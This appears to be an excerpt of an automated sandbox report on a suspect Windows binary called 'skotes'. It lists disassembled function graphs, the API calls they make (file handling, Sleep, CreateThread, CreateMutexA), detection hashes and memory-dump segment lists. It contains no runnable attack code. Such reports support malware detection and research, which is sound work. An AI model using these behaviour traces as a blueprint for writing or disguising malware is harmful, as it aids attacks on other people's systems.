                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InfoNativeSystem
                                                                                                                                            • String ID: JjsrPl==$JjsrQV==$JjssOl==$JjssPV==
                                                                                                                                            • API String ID: 1721193555-3123340372
                                                                                                                                            • Opcode ID: ba5cecb50d825dede2616775138a5394b1d4bc140c059ce8c9cb892a3a62f966
                                                                                                                                            • Instruction ID: eec50f78f9f9899c7e06055edff09ed6c932740e3c0e7bf29a980b1a7124361f
                                                                                                                                            • Opcode Fuzzy Hash: ba5cecb50d825dede2616775138a5394b1d4bc140c059ce8c9cb892a3a62f966
                                                                                                                                            • Instruction Fuzzy Hash: DFE1F871E006549BDB24BB28CD4BBAE7B61AB41720F9502DCE415AB3D2DF355E818BC2

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1903 b01abc-b01aec call b0180a 1906 b01b07-b01b13 call afbf3a 1903->1906 1907 b01aee-b01af9 call af75e3 1903->1907 1913 b01b15-b01b2a call af75e3 call af75f6 1906->1913 1914 b01b2c-b01b75 call b01775 1906->1914 1912 b01afb-b01b02 call af75f6 1907->1912 1923 b01de1-b01de5 1912->1923 1913->1912 1921 b01be2-b01beb GetFileType 1914->1921 1922 b01b77-b01b80 1914->1922 1927 b01c34-b01c37 1921->1927 1928 b01bed-b01c1e call af75c0 1921->1928 1925 b01b82-b01b86 1922->1925 1926 b01bb7-b01bdd call af75c0 1922->1926 1925->1926 1930 b01b88-b01bb5 call b01775 1925->1930 1926->1912 1931 b01c40-b01c46 1927->1931 1932 b01c39-b01c3e 1927->1932 1928->1912 1950 b01c24-b01c2f call af75f6 1928->1950 1930->1921 1930->1926 1935 b01c4a-b01c98 call afbe85 1931->1935 1936 b01c48 1931->1936 1932->1935 1945 b01cb7-b01cdf call b01522 1935->1945 1946 b01c9a-b01ca6 call b01984 1935->1946 1936->1935 1955 b01ce1-b01ce2 1945->1955 1956 b01ce4-b01d25 1945->1956 1946->1945 1953 b01ca8 1946->1953 1950->1912 1957 b01caa-b01cb2 call afaf48 1953->1957 1955->1957 1959 b01d46-b01d54 1956->1959 1960 b01d27-b01d2b 1956->1960 1957->1923 1963 b01d5a-b01d5e 1959->1963 1964 b01ddf 1959->1964 1960->1959 1962 b01d2d-b01d41 1960->1962 1962->1959 1963->1964 1966 b01d60-b01d93 call b01775 1963->1966 1964->1923 1970 b01d95-b01dc1 call af75c0 call afc04d 1966->1970 1971 b01dc7-b01ddb 1966->1971 1970->1971 1971->1964
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00B01775: CreateFileW.KERNEL32(00000000,00000000,?,00B01B65,?,?,00000000,?,00B01B65,00000000,0000000C), ref: 00B01792
                                                                                                                                            • __dosmaperr.LIBCMT ref: 00B01BD7
                                                                                                                                            • GetFileType.KERNEL32(00000000), ref: 00B01BE3
                                                                                                                                            • __dosmaperr.LIBCMT ref: 00B01BF6
                                                                                                                                            • __dosmaperr.LIBCMT ref: 00B01D9C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __dosmaperr$File$CreateType
                                                                                                                                            • String ID: H
                                                                                                                                            • API String ID: 3443242726-2852464175
                                                                                                                                            • Opcode ID: 6daf1135796c5733cbe03133bc2b1c96a339fc0a2b1cd0c597a06ee30acd20bd
                                                                                                                                            • Instruction ID: 01744aaefa720d7f8078f9d26d80a7702a9d990f21c06a3a688c6e18a29d6ebc
                                                                                                                                            • Opcode Fuzzy Hash: 6daf1135796c5733cbe03133bc2b1c96a339fc0a2b1cd0c597a06ee30acd20bd
                                                                                                                                            • Instruction Fuzzy Hash: B8A1E332A141499FCF2DEF6CC991BAE3FE1EB06320F144699E811AF2D1DB359912CB51

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 2279 ac7590-ac75e1 Sleep 2280 ac7661-ac76d7 call ad80c0 * 3 CreateThread Sleep 2279->2280 2281 ac75e3-ac75f7 call add111 2279->2281 2294 ac76d9-ac76e5 2280->2294 2295 ac7705-ac771d 2280->2295 2281->2280 2287 ac75f9-ac765e call add64e call add0c7 2281->2287 2287->2280 2297 ac76fb-ac7702 call add663 2294->2297 2298 ac76e7-ac76f5 2294->2298 2299 ac771f-ac772b 2295->2299 2300 ac7747-ac775f 2295->2300 2297->2295 2298->2297 2303 ac779b-ac77a0 call af6c6a 2298->2303 2305 ac773d-ac7744 call add663 2299->2305 2306 ac772d-ac773b 2299->2306 2301 ac7789-ac779a 2300->2301 2302 ac7761-ac776d 2300->2302 2308 ac777f-ac7786 call add663 2302->2308 2309 ac776f-ac777d 2302->2309 2305->2300 2306->2303 2306->2305 2308->2301 2309->2303 2309->2308
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(00000064,E6CEA310,?,00000000,00B09138,000000FF), ref: 00AC75CC
                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00AC7430,00B28638,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00AC76BF
                                                                                                                                            • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00AC76C9
                                                                                                                                              • Part of subcall function 00ADD0C7: RtlWakeAllConditionVariable.NTDLL ref: 00ADD17B
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep$ConditionCreateThreadVariableWake
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 79123409-0
                                                                                                                                            • Opcode ID: 8bfdb1c9c8023f271fda76bb2e94f59f14ba2abb3ab7d0101216cca48dfb4653
                                                                                                                                            • Instruction ID: fedf50e4004ac54f7f40b16ab3c726a3e77637be276233d388d459b1e0d4c88c
                                                                                                                                            • Opcode Fuzzy Hash: 8bfdb1c9c8023f271fda76bb2e94f59f14ba2abb3ab7d0101216cca48dfb4653
                                                                                                                                            • Instruction Fuzzy Hash: B051EE71212248ABEB25DF28DD85F9D3BA1EB48704F508659F819973E1CB7AE480CF91

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 2316 af6fb4-af6fe9 GetFileType 2317 af6fef-af6ffa 2316->2317 2318 af70a1-af70a4 2316->2318 2319 af701c-af7038 call af40f0 GetFileInformationByHandle 2317->2319 2320 af6ffc-af700d call af732a 2317->2320 2321 af70cd-af70f5 2318->2321 2322 af70a6-af70a9 2318->2322 2332 af70be-af70cb call af75c0 2319->2332 2333 af703e-af7080 call af727c call af7124 * 3 2319->2333 2336 af70ba-af70bc 2320->2336 2337 af7013-af701a 2320->2337 2323 af70f7-af710a 2321->2323 2324 af7112-af7114 2321->2324 2322->2321 2327 af70ab-af70ad 2322->2327 2323->2324 2343 af710c-af710f 2323->2343 2329 af7115-af7123 call adcff1 2324->2329 2331 af70af-af70b4 call af75f6 2327->2331 2327->2332 2331->2336 2332->2336 2352 af7085-af709d call af7249 2333->2352 2336->2329 2337->2319 2343->2324 2352->2324 2355 af709f 2352->2355 2355->2336
                                                                                                                                            APIs
                                                                                                                                            • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00AF6EE6), ref: 00AF6FD6
                                                                                                                                            • GetFileInformationByHandle.KERNEL32(?,?), ref: 00AF7030
                                                                                                                                            • __dosmaperr.LIBCMT ref: 00AF70C5
                                                                                                                                              • Part of subcall function 00AF732A: __dosmaperr.LIBCMT ref: 00AF735F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File__dosmaperr$HandleInformationType
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2531987475-0
                                                                                                                                            • Opcode ID: 669fc56d5bca7fb2c34504cfe7a2cd91f58b56aba523250ef650f766672180a9
                                                                                                                                            • Instruction ID: e5b2243ee02b4f1600c9fc0b7dfd1c43d993e580cb84246e1cbd3eeb846bd667
                                                                                                                                            • Opcode Fuzzy Hash: 669fc56d5bca7fb2c34504cfe7a2cd91f58b56aba523250ef650f766672180a9
                                                                                                                                            • Instruction Fuzzy Hash: 43415C75904208ABDB24EFB5DD459BFBBF9EF88300B10492DFA56D3221EB309904CB61

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 2356 ac9ba5-ac9bc5 GetFileAttributesA 2359 ac9bc7-ac9bd3 2356->2359 2360 ac9bf3-ac9c0f 2356->2360 2363 ac9be9-ac9bf0 call add663 2359->2363 2364 ac9bd5-ac9be3 2359->2364 2361 ac9c3d-ac9c5c 2360->2361 2362 ac9c11-ac9c1d 2360->2362 2367 ac9c5e-ac9c6a 2361->2367 2368 ac9c8a-aca916 call ad80c0 2361->2368 2365 ac9c1f-ac9c2d 2362->2365 2366 ac9c33-ac9c3a call add663 2362->2366 2363->2360 2364->2363 2369 aca91c 2364->2369 2365->2366 2365->2369 2366->2361 2372 ac9c6c-ac9c7a 2367->2372 2373 ac9c80-ac9c87 call add663 2367->2373 2375 aca953-aca987 Sleep CreateMutexA 2369->2375 2376 aca91c call af6c6a 2369->2376 2372->2369 2372->2373 2373->2368 2384 aca98e-aca994 2375->2384 2376->2375 2386 aca996-aca998 2384->2386 2387 aca9a7-aca9a8 2384->2387 2386->2387 2388 aca99a-aca9a5 2386->2388 2388->2387 2390 aca9a9-aca9b0 call af6629 2388->2390
                                                                                                                                            APIs
                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 00AC9BA8
                                                                                                                                            • Sleep.KERNEL32(00000064,?), ref: 00ACA963
                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00B23254), ref: 00ACA981
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
